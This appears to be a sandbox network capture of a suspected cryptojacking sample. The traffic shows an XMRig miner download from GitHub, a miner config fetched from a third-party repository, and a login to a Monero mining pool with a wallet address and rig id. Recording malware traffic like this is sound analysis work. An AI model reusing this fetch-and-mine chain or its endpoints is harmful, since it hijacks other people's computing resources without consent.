                                  2024-09-18 06:17:08 UTC3438INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  2192.168.2.1351556185.199.108.133443
                                  TimestampBytes transferredDirectionData
                                  2024-09-18 06:17:08 UTC745OUTGET /github-production-release-asset-2e65be/88327406/d0ce794d-b593-4f8f-bb2d-6bfa0096266b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240918%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240918T061708Z&X-Amz-Expires=300&X-Amz-Signature=00531079fb788ace60d0eb8b92c6dc27d7d59c703c0049561047ae2f2958161a&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream HTTP/1.1
                                  Host: objects.githubusercontent.com
                                  User-Agent: Go-http-client/1.1
                                  Referer: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz
                                  Accept-Encoding: gzip
                                  2024-09-18 06:17:08 UTC822INHTTP/1.1 200 OK
                                  Connection: close
                                  Content-Length: 3505638
                                  Content-Type: application/octet-stream
                                  Last-Modified: Tue, 23 Apr 2024 09:49:36 GMT
                                  ETag: "0x8DC637AAFEAB9F6"
                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                  x-ms-request-id: 687fd54c-401e-0066-5ea6-deae75000000
                                  x-ms-version: 2020-10-02
                                  x-ms-creation-time: Tue, 23 Apr 2024 09:49:36 GMT
                                  x-ms-lease-status: unlocked
                                  x-ms-lease-state: available
                                  x-ms-blob-type: BlockBlob
                                  Content-Disposition: attachment; filename=xmrig-6.21.3-linux-static-x64.tar.gz
                                  x-ms-server-encrypted: true
                                  Via: 1.1 varnish, 1.1 varnish
                                  Fastly-Restarts: 1
                                  Accept-Ranges: bytes
                                  Age: 944
                                  Date: Wed, 18 Sep 2024 06:17:08 GMT
                                  X-Served-By: cache-iad-kjyo7100178-IAD, cache-ewr-kewr1740046-EWR
                                  X-Cache: HIT, HIT
                                  X-Cache-Hits: 3261, 0
                                  X-Timer: S1726640229.734722,VS0,VE7
                                  2024-09-18 06:17:08 UTC1378INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec 5a 09 7c 93 c5 b6 ff 5a d2 85 cd a6 65 79 65 7d 79 25 4f f1 62 6a d2 36 4d 0a 0a ad b4 98 4a 21 d5 02 62 01 21 4d d2 36 90 26 21 4b 69 29 c5 0a 54 89 b1 5e ae 2b b8 a1 57 af 72 15 a4 20 68 95 ad b2 58 14 14 70 41 c4 05 7c a2 4c 5f 91 5e ef 73 fb 29 d0 77 ce cc 24 cd 97 7c fd e9 bb 4f ef 5b 6e 87 5f e7 fb e6 cc ff 2c 73 e6 cc 99 99 2f d4 54 b9 6d 15 aa ec f4 0c 4d 7a e6 d5 c2 6f 53 d4 6a 75 86 4e ab c5 a7 46 a7 55 87 3f 83 45 d0 64 65 6b 34 d9 3a 9d 4e a3 13 d4 9a 4c 68 0a 0a ed 6f 64 8f a8 f8 3c 5e 93 5b a1 10 ca 7c 36 bb a5 cc e9 ed 09 f7 73 fd ff 47 4b 4d f8 fc 9b 9d 8e 72 5b 45 fa 42 8f d3 f1 6b ea c0 09 ce ce ca ea 69 fe b3 b2 b4 19 11 f3 af cd d4 68 04 85 fa d7 34 a2 a7 f2 0f 3e ff 75 fd 14 50 d2 4c 2e 5b da 78 05 6b
                                  Data Ascii: Z|Zeye}y%Obj6MJ!b!M6&!Ki)T^+Wr hXpA|L_^s)w$|O[n_,s/TmMzoSjuNFU?Edek4:NLhod<^[|6sGKMr[EBkih4>uPL.[xk
                                  2024-09-18 06:17:08 UTC1378INData Raw: 79 09 ea bb 89 eb eb c9 ce d3 99 f1 a2 67 30 c2 64 dc 76 9c fb eb a7 cf 04 7a 4c 2b d2 76 f0 fe 58 de 4e 0a c3 0f 86 bf 3e 1c bf f6 d1 7b 34 ca a7 ee 2d 18 b5 ee 7d 95 f1 d2 b2 c7 7d 2d 77 fe f5 bf 60 7e 6f e9 2d bd a5 b7 f4 96 de d2 5b 7a 4b 6f e9 2d bd a5 b7 fc c3 96 e2 d9 fb fe 5b fc 33 0d fe 8b 7b f0 52 58 52 4c 5a ff c5 28 18 fc e7 0d fe 36 83 7f 1f 59 61 2e 16 0c 4d 71 fb 8e d6 c1 63 c8 aa 77 04 e8 3b 65 68 d2 de 85 04 7f 1f 12 9b 81 e8 03 40 24 67 29 63 27 49 ba bb 54 58 43 a5 11 2f 92 9a b4 b5 eb e7 42 4f 5b a1 7f 3f c9 40 79 81 7c a5 c1 62 18 27 fb d7 b1 00 4a 6a 7c 04 6a 43 db de e6 a3 bf 47 70 2a 48 2e f2 9f 25 1b 34 46 81 49 49 67 52 32 bb a5 9c 2b 8b 94 e2 bb b5 5b c2 f1 23 4c 42 39 48 80 27 0e 63 2a 15 11 97 0f f7 5c 43 a0 3e d1 e0 2f 10 0c
                                  Data Ascii: yg0dvzL+vXN>{4-}}-w`~o-[zKo-[3{RXRLZ(6Ya.Mqcw;eh@$g)c'ITXC/BO[?@y|b'Jj|jCGp*H.%4FIIgR2+[#LB9H'c*\C>/
                                  2024-09-18 06:17:08 UTC1378INData Raw: c8 a7 7f d0 30 29 30 4d 95 07 01 4c 76 1f 80 ea 95 03 cc 83 d5 94 6d a7 72 0d 6e 37 1f a6 32 ce 13 22 ce 05 c8 79 0f aa 01 0f 2a 0c 81 9d ca 27 e8 51 2d 5f 39 96 4c 3d 59 2a 68 ba 70 0b 32 f8 77 2a 9b e9 ce 73 36 e9 ca 55 14 42 fc 28 0f 6c 4b 1e 22 25 97 5a 94 8d 16 5d 85 16 5d 71 80 85 fd 99 c1 32 aa a9 b2 1b 99 8f 42 06 dc 5e 4a e7 72 ff 20 9c cb 3a 35 39 f2 21 9a 54 37 96 79 76 d3 20 63 24 1b 5d 1b ef 37 80 ec 43 fb a1 7a 7d 3f 66 e5 50 fa 7d 74 10 5b 4f 3f c4 84 1b a5 a2 e7 a1 06 9e 0f c8 07 8b 65 12 20 6a f9 32 14 ec 46 c1 55 fb 71 e5 d5 e9 c9 87 4b d9 78 4d 0d a8 09 29 6d 9c 62 6c a0 31 76 96 64 e7 d3 05 d3 72 09 23 f6 ab 39 f0 de 98 0a c1 1a 11 03 0a 94 3d 94 da 0b cc ef a4 d0 11 07 f3 7f 0a 5b 0a 17 6e 63 13 bf 2d 85 6d a5 e7 6e eb 8e 34 df 8c c2
                                  Data Ascii: 0)0MLvmrn72"y*'Q-_9L=Y*hp2w*s6UB(lK"%Z]]q2B^Jr :59!T7yv c$]7Cz}?fP}t[O?e j2FUqKxM)mbl1vdr#9=[nc-mn4
                                  2024-09-18 06:17:08 UTC1378INData Raw: 2e 91 2d 39 b3 8f 2d 89 11 bc 5d c2 db fd 79 7b 32 6f ff 94 c0 da 99 bc dd c1 db 63 78 fb 23 de 1e e4 e3 bb bc 9a fc a0 0f 6e 64 e7 f9 9b 9c 9c e1 6f 0a 72 92 bf b9 c8 51 fe 56 09 67 4a 43 d3 46 76 1b d9 a1 a7 a1 56 e4 ff 82 34 f3 fe 1a f2 0c 7f 5b 40 1e d5 33 75 f7 eb 8d 12 6b 65 2a 5a e4 f7 06 37 04 67 c8 10 6b c8 90 39 21 43 6e 94 14 41 23 6f 0a 88 20 d7 b4 04 e5 5c 11 92 33 2a 24 67 50 48 4e 5f 78 6b af a4 eb 85 ee 67 ba 20 f8 2f ba 20 f8 4b 5d 10 fc 31 bc b5 4f 00 30 f8 6a 87 22 86 4e 70 52 e3 1d ec 4a 46 2e 39 60 92 78 54 fc d5 11 11 15 7f 88 8f 88 8a 86 f8 f0 a8 70 c7 87 47 85 25 3e 3c 2a 66 c5 f3 a8 78 8c 0a 8d 3e 27 cd f4 c0 80 a7 be 0c 55 dd e2 58 a1 dd c5 6f e6 97 e2 98 b7 b3 3d f4 5b 23 39 cf db 97 f3 f6 65 3a e9 95 1b 8f e2 2e bc c4 4f a9 6b
                                  Data Ascii: .-9-]y{2ocx#ndorQVgJCFvV4[@3uke*Z7gk9!CnA#o \3*$gPHN_xkg / K]1O0j"NpRJF.9`xTpG%><*fx>'UXo=[#9e:.Ok
                                  2024-09-18 06:17:08 UTC1378INData Raw: 22 bf f5 24 92 88 b7 51 23 78 f7 64 8c 78 1f 78 f0 eb aa ea f7 e6 cd cc 63 bf 2f 7f f0 98 ee 57 5d 55 7d 55 d7 d5 2f 80 61 1d e8 05 26 b7 a4 cd 10 44 5d 1c 90 cc 55 25 36 76 68 bc 64 6e 00 67 b8 17 e7 d5 b2 86 bf cf fd 3a 1d 2d ca 48 4c 64 20 4b 90 35 f4 a4 d1 72 e7 00 71 3f a4 5b 5f 2c 79 1f 5e b8 cd 20 2e 72 f0 9f 8a 76 96 db 34 7a 33 7d 37 35 ba a3 e2 8e 7e bb f5 27 88 08 01 61 cf 7f 70 25 98 bf d0 03 73 38 76 59 19 17 ef c5 d7 80 f3 b8 67 06 c9 7c 1e 82 69 a0 bf f2 02 58 ec c9 2c bb c1 05 8e 3e bd 91 c1 5a f6 ce 1c 03 fd bd f9 d2 a0 5e c8 10 63 d7 65 0d 93 e4 95 fc ab 75 25 ef 58 c5 57 72 d8 07 7c 25 9b 92 02 fc c0 ed 75 03 17 be 6b 00 18 e8 ee f0 f0 61 ee 1d e8 34 e3 e3 5a 9e 0c 4e 15 e3 25 9d 31 33 81 ff 62 bf 75 f1 20 63 81 96 c2 97 f5 06 c9 7a 66
                                  Data Ascii: "$Q#xdxxc/W]U}U/a&D]U%6vhdng:-HLd K5rq?[_,y^ .rv4z3}75~'ap%s8vYg|iX,>Z^ceu%XWr|%uka4ZN%13bu czf
                                  2024-09-18 06:17:08 UTC1378INData Raw: 8e ef 11 07 a9 c3 b6 e1 93 40 f4 97 8d 97 0f de ce 5a 40 29 17 d8 96 4d 14 0a 8a 84 10 9d 13 45 82 74 6c ca b7 d6 14 9f 72 7f 27 ca f0 f1 cd 04 00 56 fc 40 4b 47 41 e6 c7 8f 87 f5 8f 18 f7 46 3a c9 82 b8 db 1d 03 0a 99 86 3b 2e e0 36 4e 63 8f e0 07 9f 01 f6 c7 d9 a6 38 2c a7 cf 34 c5 0e b6 1f 9f 28 7b eb 4f d4 c1 2e dd 0b 37 a5 59 28 a7 68 39 98 03 26 95 e7 03 59 d5 be ec 2f 4c 98 73 fe a4 0d da 86 d6 31 41 e1 e7 24 79 1a bf f1 27 53 6c dc 7d 03 4a d1 7f d7 19 34 1a f5 62 47 b9 5d ce 56 16 08 7b 2d 5d 13 35 ae e0 59 49 30 ff 1c 90 bd 8f d0 f2 39 d3 af 4e 7d ce f4 ac 53 9f 33 1d b0 4f 73 c2 58 a0 3f 79 9f d9 8e 06 ea 78 40 12 f9 33 2f de a6 f5 d7 4a 94 ab 44 d9 35 89 d6 4d 18 eb 71 df 05 3b d0 f9 be 8b a4 15 13 3c 3f 0e f2 5f 36 d2 fa 11 3c 6d bd ad e6 29
                                  Data Ascii: @Z@)MEtlr'V@KGAF:;.6Nc8,4({O.7Y(h9&Y/Ls1A$y'Sl}J4bG]V{-]5YI09N}S3OsX?yx@3/JD5Mq;<?_6<m)
                                  2024-09-18 06:17:08 UTC1378INData Raw: d3 ed f4 a2 c6 9a 6e d7 4f a0 15 aa 97 e7 75 e1 72 74 0c 1b 07 bd cd 47 a7 eb 67 36 61 e3 e7 d7 1a 05 77 02 f0 c7 9f 8a fc 6f 84 db 1b d6 44 26 5b 48 15 fe 4a c5 2a aa 70 57 2a ee 8e 46 3d 28 ef 2f 72 45 0e 41 a4 29 15 f3 a9 62 8a 52 31 9d 2a 62 95 8a f1 54 11 a9 54 e8 a9 22 48 a9 e8 2f f8 50 2a 7a 50 85 8f 52 f1 aa 60 4c a9 48 20 c6 2a dc e4 8a b3 57 11 a2 58 a9 38 44 15 a5 8a ab 68 f7 55 3a e8 63 1a 28 c3 f4 7a 2c 9d e5 dd 1b 64 9f 42 dc 35 0f 7c 33 ae d6 de 5b 82 19 79 bb 62 51 d4 f8 2b f0 19 57 ed 57 23 0a 82 ec 58 b0 32 73 e1 fe 4f ae 5d 8b b7 1c 5a 0c 80 16 89 84 d9 ca 49 e5 55 74 8e b0 e3 35 f6 9c e0 b4 f6 00 0a fe 40 a1 6d 2e d9 8a e7 ae 90 5b 14 15 d4 fe 37 49 df 0d b3 d1 3c c7 40 cb 3b a3 49 57 85 78 05 3b d9 52 68 88 ac b2 25 ed 81 ff 13 35 33
                                  Data Ascii: nOurtGg6awoD&[HJ*pW*F=(/rEA)bR1*bTT"H/P*zPR`LH *WX8DhU:c(z,dB5|3[ybQ+WW#X2sO]ZIUt5@m.[7I<@;IWx;Rh%53
                                  2024-09-18 06:17:08 UTC1378INData Raw: 47 8e 5f 01 8e 3d b1 fd 5e 49 71 dc ee 3b 8b 1a 4d 32 37 98 af e5 e2 77 18 c4 fd 86 b3 b4 cd 6b 86 52 7e b4 c8 59 cf 39 6b d0 1c 8e 3d 1c 8c 7d b9 4c f8 8b a7 9e 55 c7 7e ab 06 83 06 26 47 de 7e a4 92 88 bc 95 0e 76 46 29 92 36 94 a4 49 d0 59 07 a9 86 b1 af 84 a1 e2 fe 93 e3 7b 5c 71 61 40 bf 17 7c f3 e3 af f8 91 12 99 9a 74 56 1d e7 bb 77 86 3a d5 74 28 69 e3 b3 0a bc b1 5c 3f 84 b0 7f 7d 46 5b a6 9e 1f 02 fe ff a5 a2 77 d9 67 48 62 1d 18 42 3c eb df a5 b9 b5 4d 4b 9e 0e 20 9b 86 d0 74 89 b8 c0 ac 33 a4 c6 eb a8 f8 be 28 8a 71 8a 17 45 c1 fa 30 51 94 f3 db 05 ef d2 ce 71 8e d4 52 56 b1 e0 a5 ea 08 9c 3b 36 9e 23 08 d5 9f 56 cf c7 ad d3 ea 48 e8 a5 d3 ea d8 67 e9 69 52 13 f2 4b c7 91 7c 1b 4c 23 33 65 82 58 bf 36 7d c4 78 50 f9 60 f9 de 93 4a 55 23 85 cb
                                  Data Ascii: G_=^Iq;M27wkR~Y9k=}LU~&G~vF)6IY{\qa@|tVw:t(i\?}F[wgHbB<MK t3(qE0QqRV;6#VHgiRK|L#3eX6}xP`JU#
                                  2024-09-18 06:17:08 UTC1378INData Raw: 5b 8a 99 01 3e ea 71 fb 17 ce fc df 79 0f cc f1 9d 39 f3 35 50 1c 09 c5 87 5d 5a d0 5a ae 2a 56 13 f8 6c 2a 0d 71 90 40 1f 24 56 31 7c 1b 86 75 6a d9 e8 b6 ba d1 17 94 54 c0 7e 8b 3f cc 3f 07 b6 c0 b5 7b ec 40 a3 db 6a 17 b4 d8 06 9f ef d8 02 8f 61 d0 b6 14 da 9e e9 46 73 df db 86 b1 01 1f 10 63 4a bf 69 ee bb 0b fe b0 e3 0b 5b 10 7f b6 5f 06 c4 8f a0 0c ef 4b 1a ae e1 48 9c 06 08 32 d4 05 18 7a 15 78 69 35 47 58 bd d2 33 3a b5 7f 28 1a a7 21 7f 5b a1 ff 3f 54 76 de 9e ac e7 a7 ff 71 76 76 36 65 7e 1c 80 e2 7f 75 c6 9e 81 b5 a0 70 7b 46 73 1d 8b ad 70 6b 49 e6 88 ab c3 ea 2c 0a 85 fc 87 d9 48 b9 8e 8d a9 24 05 62 39 a0 37 0d e8 d6 7b 9e c4 42 90 0b 47 7b 6b 2a b4 4c 9e 2d 64 53 3b d1 32 3e 94 16 50 33 51 1e 1a 4a 7c 3d 3f 42 e5 10 f1 fe d6 11 43 63 36 b0
                                  Data Ascii: [>qy95P]ZZ*Vl*q@$V1|ujT~??{@jaFscJi[_KH2zxi5GX3:(![?Tvqvv6e~up{FspkI,H$b97{BG{k*L-dS;2>P3QJ|=?BCc6
                                  2024-09-18 06:17:08 UTC1378INData Raw: 20 35 88 fb 34 1d 3e 26 c8 33 55 a7 12 9d a1 82 ce 3b e0 fa 2e 05 69 fa 6b 64 04 cd 17 9c bd 9a 00 4e 65 37 64 b7 9e 4a f5 45 c8 67 54 2b 31 9b c0 1b 1f c3 2e c5 84 fd 65 fe 12 2a fd 66 21 4d ba 11 cf f7 b7 38 ca cc e0 7a 49 90 ad 91 e3 cd 55 e5 2d d9 e3 5f ad a1 7c d2 79 62 c4 2e 25 de ac 35 76 18 db ea 5d 4d 21 6b df 23 61 45 e4 5e 2b 57 0d b9 50 8c 73 0b cf 95 40 28 6a 7a 7e a1 aa 0f a1 5d 2e a7 f4 64 2e 5c ba 61 1c cf e6 ac af 57 7b c5 b6 ad 5b e3 7e 7c 4b e5 db 61 bd 0a 55 16 81 7c 7a e0 eb 01 7c 5d c7 27 2b 76 b9 6b 17 2a 77 b9 dd 0a 95 bb dc 4f 0a 94 cf 01 6e 17 28 47 d8 5f 0b 58 f5 fc d9 82 bf d7 c1 c4 25 05 6c 97 72 aa ab fd cd a4 12 0a 27 07 c6 29 73 3c b7 80 6d d9 07 93 4d f9 41 76 3c c5 15 92 0d 89 66 8e 93 df fc 9c c6 71 8a e7 29 f8 92 d8 28
                                  Data Ascii: 54>&3U;.ikdNe7dJEgT+1.e*f!M8zIU-_|yb.%5v]M!k#aE^+WPs@(jz~].d.\aW{[~|KaU|z|]'+vk*wOn(G_X%lr')s<mMAv<fq)(


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  3192.168.2.1351558185.199.108.133443
                                  TimestampBytes transferredDirectionData
                                  2024-09-18 06:17:16 UTC148OUTGET /spetterman66/verynicerepo/main/config.json HTTP/1.1
                                  Host: raw.githubusercontent.com
                                  User-Agent: Go-http-client/1.1
                                  Accept-Encoding: gzip
                                  2024-09-18 06:17:16 UTC900INHTTP/1.1 200 OK
                                  Connection: close
                                  Content-Length: 3567
                                  Cache-Control: max-age=300
                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                  Content-Type: text/plain; charset=utf-8
                                  ETag: "e3047655d4268d619b50ec05c73a751f5ef3dbb04e486caab12fc585ee5c67bb"
                                  Strict-Transport-Security: max-age=31536000
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: deny
                                  X-XSS-Protection: 1; mode=block
                                  X-GitHub-Request-Id: 977B:259A0C:2618EF:2AD614:66EA706B
                                  Accept-Ranges: bytes
                                  Date: Wed, 18 Sep 2024 06:17:16 GMT
                                  Via: 1.1 varnish
                                  X-Served-By: cache-ewr-kewr1740043-EWR
                                  X-Cache: MISS
                                  X-Cache-Hits: 0
                                  X-Timer: S1726640236.244372,VS0,VE89
                                  Vary: Authorization,Accept-Encoding,Origin
                                  Access-Control-Allow-Origin: *
                                  Cross-Origin-Resource-Policy: cross-origin
                                  X-Fastly-Request-ID: f3f1096c492f2527ecff33fd53db402e4aa5391f
                                  Expires: Wed, 18 Sep 2024 06:22:16 GMT
                                  Source-Age: 0
                                  2024-09-18 06:17:16 UTC1378INData Raw: 7b 0a 20 20 20 20 22 61 70 69 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 22 77 6f 72 6b 65 72 2d 69 64 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 64 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 22 68 6f 73 74 22 3a 20 22 31 32 37 2e 30 2e 30 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 22 61 63 63 65 73 73 2d 74 6f 6b 65 6e 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 22 72 65 73 74 72 69 63 74 65 64 22 3a 20 74 72 75 65 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 75 74 6f 73 61 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 62 61 63 6b 67 72 6f 75
                                  Data Ascii: { "api": { "id": null, "worker-id": null }, "http": { "enabled": false, "host": "127.0.0.1", "port": 0, "access-token": null, "restricted": true }, "autosave": true, "backgrou
                                  2024-09-18 06:17:16 UTC1378INData Raw: 20 5b 32 2c 20 36 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 37 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 38 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 39 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 31 30 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 31 31 5d 0a 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 22 63 6e 2f 75 70 78 32 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 30 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 31 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 32 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 33 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 34 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b
                                  Data Ascii: [2, 6], [2, 7], [2, 8], [2, 9], [2, 10], [2, 11] ], "cn/upx2": [ [2, 0], [2, 1], [2, 2], [2, 3], [2, 4], [
                                  2024-09-18 06:17:16 UTC811INData Raw: 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 64 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6c 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 6e 69 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6c 73 2d 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 64 61 65 6d 6f 6e 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 6f 63 6b 73 35 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 2d 73 65 6c 65 63 74 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                  Data Ascii: lse, "keepalive": true, "enabled": true, "tls": true, "sni": false, "tls-fingerprint": null, "daemon": false, "socks5": null, "self-select": null,


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  4192.168.2.1342184141.94.96.195443
                                  TimestampBytes transferredDirectionData
                                  2024-09-18 06:17:43 UTC573OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 41 4a 5a 5a 76 33 72 54 59 7a 4a 58 54 38 68 55 62 62 79 72 7a 64 58 63 54 43 44 74 33 62 57 62 6a 6b 39 73 44 66 59 53 79 6e 6a 4d 34 72 55 59 68 55 75 36 4e 53 32 34 70 73 41 74 7a 6d 42 59 45 67 7a 7a 75 58 71 38 78 46 4b 54 46 43 70 43 31 41 79 4d 64 5a 6b 54 42 78 6d 68 76 6a 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 33 20 28 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 38 2e 30 20 67 63 63 2f 31 33 2e 32 2e 31 22 2c 22 72 69 67 69 64 22 3a 22 31 37 6c 69 66 65 72 73 2d 76 6e 63 2d 33 31 22
                                  Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4AJZZv3rTYzJXT8hUbbyrzdXcTCDt3bWbjk9sDfYSynjM4rUYhUu6NS24psAtzmBYEgzzuXq8xFKTFCpC1AyMdZkTBxmhvj","pass":"x","agent":"XMRig/6.21.3 (Linux x86_64) libuv/1.48.0 gcc/13.2.1","rigid":"17lifers-vnc-31"
                                  2024-09-18 06:17:44 UTC539INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 63 36 61 61 39 38 66 37 2d 31 32 31 37 2d 34 66 33 30 2d 39 66 32 37 2d 66 33 34 36 37 30 31 62 32 62 64 33 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 65 65 30 61 39 62 37 30 36 30 61 30 36 66 63 34 32 34 37 64 39 63 38 30 64 66 65 31 36 32 37 62 38 65 30 65 37 39 63 32 65 38 66 38 64 64 65 33 38 63 65 37 36 34 64 36 38 33 34 32 63 62 34 36 38 63 61 65 66 32 66 62 66 30 30 30 30 30 30 30 30 36 33 34 33 30 35 66 39 65 33 39 37 33 32 38 38 63 39 35 35 30 32 61 39 36 62 38 61 39 64 35 39 37 39 30 63 36 64 32 33 33 62 38 65 33 63 30 66 34 63 36 38 37 64 33 33 30 65 31 37 66 31 34
                                  Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"c6aa98f7-1217-4f30-9f27-f346701b2bd3","job":{"blob":"1010fee0a9b7060a06fc4247d9c80dfe1627b8e0e79c2e8f8dde38ce764d68342cb468caef2fbf00000000634305f9e3973288c95502a96b8a9d59790c6d233b8e3c0f4c687d330e17f14
                                  2024-09-18 06:17:44 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 38 65 31 61 39 62 37 30 36 30 61 30 36 66 63 34 32 34 37 64 39 63 38 30 64 66 65 31 36 32 37 62 38 65 30 65 37 39 63 32 65 38 66 38 64 64 65 33 38 63 65 37 36 34 64 36 38 33 34 32 63 62 34 36 38 63 61 65 66 32 66 62 66 30 30 30 30 30 30 30 30 37 34 63 66 39 37 64 37 35 62 39 33 61 66 66 31 34 38 34 66 66 35 34 61 66 63 30 32 64 35 33 30 33 34 33 66 34 63 30 31 34 36 34 36 62 39 62 66 36 62 33 64 37 39 63 63 36 63 33 34 61 62 65 35 30 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6b 79 4d 66 55 74 53 30 68 6a 6a 36 48 48 6c 37 70 6d 38 78 33 49 4f 53 33 61 73 32 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101088e1a9b7060a06fc4247d9c80dfe1627b8e0e79c2e8f8dde38ce764d68342cb468caef2fbf0000000074cf97d75b93aff1484ff54afc02d530343f4c014646b9bf6b3d79cc6c34abe50d","job_id":"kyMfUtS0hjj6HHl7pm8x3IOS3as2","target":"8
